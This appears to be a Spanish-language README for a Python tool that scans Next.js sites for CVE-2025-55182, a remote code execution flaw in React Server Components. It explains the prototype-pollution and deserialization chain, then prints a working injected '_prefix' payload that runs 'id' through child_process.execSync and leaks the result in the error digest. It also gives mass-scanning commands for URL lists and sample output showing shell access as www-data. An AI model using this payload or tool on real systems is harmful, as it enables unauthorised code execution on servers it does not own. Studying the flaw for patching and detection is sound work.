
Escáner de seguridad para CVE-2025-55182 - Vulnerabilidad crítica de RCE en React Server Components
Esta herramienta verifica si un objetivo es vulnerable a CVE‑2025‑55182, un fallo de Ejecución Remota de Código causado por el manejo inseguro de cargas útiles de modelo RSC (React Server Components) dentro de Next.js.
La vulnerabilidad encadena Contaminación de Prototipo → Abuso de Deserialización → Ejecución de JavaScript del Lado del Servidor.
Aviso legal: Solo use esto en sistemas que posea legalmente o para los que tenga autorización explícita. Probar sin autorización = delito, colega.
Next.js procesa internamente objetos “model” especiales enviados mediante multipart/form-data.
Si un atacante inyecta una estructura maliciosa como un thenable falsificado, puede envenenar:
__proto___response._prefixconstructor.constructorEsto lleva al servidor a evaluar JavaScript controlado por el atacante, resultando en RCE completo.
-u) o una lista de objetivos (-l)id) del digest de error del servidorfoxvuln.txtpython3 main.py -u https://target.com
python3 main.py -l list.txt
La carga útil abusa de process.mainModule.require('child_process').execSync() a través del _prefix inyectado:
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
Esto fuerza al servidor a ejecutar id y filtrar el resultado dentro del digest lanzado (porque los errores RSC devuelven intencionadamente un campo “digest” estructurado).
Objetivo vulnerable:
[+] Testing: https://victim.com
[VULN] user : uid=1000(www-data)
No vulnerable:
[+] Testing: https://secure.com
[NOT VULN]
Todas las URLs confirmadas como vulnerables se guardan en:
foxvuln.txt
Formato:
https://victim.com => uid=1000(www-data)
/